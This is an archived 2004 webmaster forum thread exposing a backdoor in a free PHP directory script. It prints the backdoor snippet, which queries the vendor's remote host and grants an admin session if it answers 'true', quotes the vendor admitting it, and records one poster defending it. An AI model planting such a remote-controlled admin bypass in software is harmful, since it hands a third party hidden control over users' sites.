Webmaster Forum


Go Back   Webmaster Forum > Marketing Forums > Web Directory Issues
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

Web Directory Issues Yahoo!, DMOZ, LookSmart, ETC.

Ezilon Directory   Improve your ranking, submit to directories   V7N Directory

Reply
 
LinkBack Thread Tools Display Modes
Old 09-05-2004, 07:49 AM   #1 (permalink)
Inactive
 
Join Date: 08-15-04
Location: Europe
Posts: 92
iTrader: 0 / 0%
Latest Blog:
None

Brian911 is liked by many
Backdoor in 'Free PHP Directory Script' ?

I read some reviews about Biz Directory's Free PHP Directory Script and some said that there was a backdoor that allowed the programmer to enter your admin area and delete everything in your database.

I had a quick look at the scripts but couldnt find anything besides an ordinary, invisible gif.

I wouldn't want to risk my directory because of this... free script or not.
Do you run this script?
Brian911 is offline  
Add Post to del.icio.us
Reply With Quote
Sponsored Links
SEO Hosting by HostGator  Advertise Here  Buy Blog Links
Old 09-05-2004, 08:17 AM   #2 (permalink)
v7n Mentor
 
awall19's Avatar
 
Join Date: 02-18-04
Location: We Are Penn State!
Posts: 3,554
iTrader: 0 / 0%
Latest Blog:
None

awall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to behold
I run the script. I save my databases frequently. If somebody did that then you can bet he would not be selling too many more scripts.
awall19 is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-05-2004, 08:32 AM   #3 (permalink)
Inactive
 
Join Date: 09-02-04
Location: Germany
Posts: 18
iTrader: 0 / 0%
Latest Blog:
None

MarketingLady is liked by many
There are 2 dirty tricks inside the original free script:

1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer

Greets
MarketingLady is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-05-2004, 09:28 AM   #4 (permalink)
v7n Mentor
 
awall19's Avatar
 
Join Date: 02-18-04
Location: We Are Penn State!
Posts: 3,554
iTrader: 0 / 0%
Latest Blog:
None

awall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to behold
Quote:
Originally Posted by MarketingLady
There are 2 dirty tricks inside the original free script:

1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer

Greets
how do you remove the part in #1 while still leaving the script operable?

if you remove that code of line from #2 does that link go away?
awall19 is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-05-2004, 09:40 AM   #5 (permalink)
No Longer Here
 
Join Date: 09-27-03
Location: State College, PA
Posts: 9,354
iTrader: 0 / 0%
Latest Blog:
None

Jazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebody
These are only in the free version?
Jazzee is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-05-2004, 09:54 AM   #6 (permalink)
v7n Mentor
 
awall19's Avatar
 
Join Date: 02-18-04
Location: We Are Penn State!
Posts: 3,554
iTrader: 0 / 0%
Latest Blog:
None

awall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to behold
Quote:
Originally Posted by Jazzee
These are only in the free version?
well if you do the $50 version you only take out the links back to his site...which is kinda screwed up if he leaves an easter egg link in there anyway.

not sure about the $700 version. if he does it with that then he is really messed up
awall19 is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-05-2004, 12:34 PM   #7 (permalink)
v7n Mentor
 
Join Date: 01-25-04
Location: South Glens Falls, NY
Posts: 389
iTrader: 0 / 0%
Latest Blog:
None

stoner3221 is a splendid one to beholdstoner3221 is a splendid one to beholdstoner3221 is a splendid one to beholdstoner3221 is a splendid one to beholdstoner3221 is a splendid one to beholdstoner3221 is a splendid one to beholdstoner3221 is a splendid one to beholdstoner3221 is a splendid one to beholdstoner3221 is a splendid one to beholdstoner3221 is a splendid one to beholdstoner3221 is a splendid one to behold
Quote:
Originally Posted by awall19
Quote:
Originally Posted by Jazzee
These are only in the free version?
well if you do the $50 version you only take out the links back to his site...which is kinda screwed up if he leaves an easter egg link in there anyway.

not sure about the $700 version. if he does it with that then he is really messed up
The full version does not have it. I went through the whole script early today but it has been modified a lot since installation; so I’m not exactly sure if it originally contained it.
I would be one aggravated person if it did. I paid what I considered big bucks for a script that had very poor cross browser compatibility and have spent over a $1,000 dollars to make it so and it’s still not right.
__________________
Skaffe Directory & WoW Directory
stoner3221 is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-05-2004, 01:57 PM   #8 (permalink)
Inactive
 
Join Date: 09-02-04
Location: Germany
Posts: 18
iTrader: 0 / 0%
Latest Blog:
None

MarketingLady is liked by many
Hi awall19

Here is a little "backdoor-fix" for #1

if ($pass) {
$rand = md5(time());
$access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
$access = fread($access,4);
if ($access == "true") {
session_start();
$HTTP_SESSION_VARS['admin'] = true;
header("Location: {$dir}admin_edit.php");
};
};

For my part, I don't like people programming backdoors in free available scripts. It isn't honest at all !
I don't know, if the $700 script has the backdoor too; if someone sends me the code, I need 2 days to check it out with some capable university specialists and post you all the results or, if necessary fixes.

Greets from Germany
MarketingLady is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-05-2004, 02:06 PM   #9 (permalink)
Inactive
 
Join Date: 09-02-04
Location: Germany
Posts: 18
iTrader: 0 / 0%
Latest Blog:
None

MarketingLady is liked by many
Sorry, awall19, I didn't answer your second question; to keep it simple, just replace the image inside <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> by your own image, e.g. <IMG SRC="http://www.mydomain.com/imges/any_image.gif" WIDTH=1 HEIGHT=1>, the image I mean beeing located on your own server. This way, bad boys can't get the referer any more :-)

Greets
MarketingLady is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-05-2004, 02:27 PM   #10 (permalink)
v7n Mentor
 
awall19's Avatar
 
Join Date: 02-18-04
Location: We Are Penn State!
Posts: 3,554
iTrader: 0 / 0%
Latest Blog:
None

awall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to beholdawall19 is a splendid one to behold
Quote:
Originally Posted by MarketingLady
Hi awall19

Here is a little "backdoor-fix" for #1

if ($pass) {
$rand = md5(time());
$access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
$access = fread($access,4);
if ($access == "true") {
session_start();
$HTTP_SESSION_VARS['admin'] = true;
header("Location: {$dir}admin_edit.php");
};
};

Greets from Germany
I pulled this part ttp://www.directory-search.org/include_variables.php? out of my script. does that work? what details was he sending? the PHPmyAdmin variables or just the general MySQL connect info
awall19 is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 07:40 AM   #11 (permalink)
Contributing Member
 
Join Date: 01-19-04
Posts: 67
iTrader: 0 / 0%
Latest Blog:
None

ssgupta is liked by somebodyssgupta is liked by somebodyssgupta is liked by somebody
I have sent the link of this thread to Javier GarcÃ*a of Biz Directory. Awaitng his response.
ssgupta is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 08:53 AM   #12 (permalink)
Inactive
 
samer's Avatar
 
Join Date: 10-13-03
Location: Lebanon
Posts: 4,099
iTrader: 0 / 0%
samer is just really nicesamer is just really nicesamer is just really nicesamer is just really nicesamer is just really nicesamer is just really nicesamer is just really nicesamer is just really nicesamer is just really nicesamer is just really nicesamer is just really nice
please inform us asap !
samer is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 09:18 AM   #13 (permalink)
Contributing Member
 
Join Date: 01-19-04
Posts: 67
iTrader: 0 / 0%
Latest Blog:
None

ssgupta is liked by somebodyssgupta is liked by somebodyssgupta is liked by somebody
He has sent a reply to me - reproduced below:

"The invisible image is just that, an image, unable to hurt in any way. It allows us to keep the records of installed scripts. It's more convenient than requesting the installation url every time the script is downloaded/installed.

The backdoor is password-protected, so it is impossible nobody but us can access the script, not even people with access to the script code. We added this feature several months after the first distribution of the script. We had several problems with abusive users, not only removing copyright links but also reselling the script, besides other aggressive actions. So we decided to include this tool. We have only used it once, and its use was more than justified. As the full script is distributed after the purchase, and there is no risk, it does not include this feature.

I can assure you no legal user of the script has anything to be afraid. In fact, if you or any other purchaser want a script copy without these things, I will have no problem sending it.

Regards

Javier GarcÃ*a
Biz Directory"

So it turns out they have been stealing our passwords?
ssgupta is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 09:42 AM   #14 (permalink)
No Longer Here
 
Join Date: 09-27-03
Location: State College, PA
Posts: 9,354
iTrader: 0 / 0%
Latest Blog:
None

Jazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebody
That is ridiculous. Shoudn't they have to tell you about that when you download the script?
Jazzee is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 10:38 AM   #15 (permalink)
Inactive
 
JayM's Avatar
 
Join Date: 07-31-04
Posts: 272
iTrader: 0 / 0%
Latest Blog:
None

JayM is liked by many
Unless thats written somewhere in their tos and you agree to it, it is illegal for them to do this. Thats just like distributing a trojan.
JayM is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 12:56 PM   #16 (permalink)
Inactive
 
Join Date: 08-15-04
Location: Europe
Posts: 92
iTrader: 0 / 0%
Latest Blog:
None

Brian911 is liked by many
Quote:
Originally Posted by Jazzee
That is ridiculous. Shoudn't they have to tell you about that when you download the script?
well, would anybody download it if they advertised it as a backdoor script?

-

thanks for the research. after having a look at the programmer's email I decided to remove the backdoor (AND the uninstall script) and install the script first of all. I also installed another script that will have a look at the script directory and the mysql database... not sure if it will remain online yet.
Brian911 is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 12:58 PM   #17 (permalink)
No Longer Here
 
Join Date: 09-27-03
Location: State College, PA
Posts: 9,354
iTrader: 0 / 0%
Latest Blog:
None

Jazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebody
Quote:
Originally Posted by Brian911
well, would anybody download it if they advertised it as a backdoor script?
No, but you'd think they'd have it in fine print somewhere.
Jazzee is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 01:01 PM   #18 (permalink)
CEO, V7 Inc
 
John Scott's Avatar
 
Join Date: 09-27-03
Location: Japan, mostly
Posts: 42,618
iTrader: 2 / 100%
John Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster material
Send a message via AIM to John Scott Send a message via Yahoo to John Scott
That is just on the free version. And, I can see Javier's point. If I offered a script for free, and they removed copyright notices/etc, I wouldn't be too happy.
__________________
Buy Permanent Contextual Links - V7N Web Directory

Questions? Call V7 toll free @ 1.888.876.8762
John Scott is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 01:02 PM   #19 (permalink)
No Longer Here
 
Join Date: 09-27-03
Location: State College, PA
Posts: 9,354
iTrader: 0 / 0%
Latest Blog:
None

Jazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebodyJazzee is liked by somebody
That doesn't make it right.
Jazzee is offline  
Add Post to del.icio.us
Reply With Quote
Old 09-06-2004, 01:08 PM   #20 (permalink)
CEO, V7 Inc
 
John Scott's Avatar
 
Join Date: 09-27-03
Location: Japan, mostly
Posts: 42,618
iTrader: 2 / 100%
John Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster materialJohn Scott is supreme webmaster material
Send a message via AIM to John Scott Send a message via Yahoo to John Scott
I fail to see how it could be wrong.
__________________
Buy Permanent Contextual Links - V7N Web Directory

Questions? Call V7 toll free @ 1.888.876.8762
John Scott is offline  
Add Post to del.icio.us
Reply With Quote
Go Back   Webmaster Forum > Marketing Forums > Web Directory Issues

Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
Please, Can someone help me with the free php directory script Loondatoon Web Directory Issues 2 07-13-2007 09:28 AM
free php directory script SEOclown Web Directory Issues 22 01-25-2007 11:17 PM
Free PHP Directory Script Template? jezza chan Graphic Design Forum 5 09-24-2006 08:16 PM
Free php directory script dingodave Web Directory Issues 6 08-28-2006 01:06 PM
Any free directory script for Windows? AverageGuy Web Directory Issues 2 08-08-2006 07:00 PM


Sponsor Links
Get exposure! Get exposure! Find Scripts Web Hosting Directory Get exposure! SEO Blog


All times are GMT -7. The time now is 02:42 PM.
© Copyright 2008 V7 Inc